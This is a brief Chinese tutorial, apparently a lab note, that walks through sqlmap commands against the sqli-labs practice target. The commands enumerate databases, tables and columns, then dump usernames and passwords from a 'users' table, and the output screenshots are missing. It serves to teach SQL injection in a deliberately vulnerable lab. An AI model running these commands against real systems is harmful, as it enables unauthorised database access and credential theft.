1. 查看所有数据库

  1. ┌──(root💀dragon)-[/usr/share]
  2. └─# sqlmap -u "192.168.1.83:80/sqli-labs-master/Less-1/?id=1" --dbs --batch

image.png

2. 查看指定数据库内的所有表

查看数据库 security 内的所有表

  1. ┌──(root💀dragon)-[~]
  2. └─# sqlmap -u "192.168.1.83:80/sqli-labs-master/Less-1/?id=1" -D "security" --tables

image.png

3. 爆列

  1. ┌──(root💀dragon)-[~]
  2. └─# sqlmap -u "192.168.1.83:80/sqli-labs-master/Less-1/?id=1" -T "users" --columns

image.png

4. 爆数值

查看表 users 下的所有 列信息

  1. ┌──(root💀dragon)-[~]
  2. └─# sqlmap -u "192.168.1.83:80/sqli-labs-master/Less-1/?id=1" -T "users" -C "username,password" --dump

image.png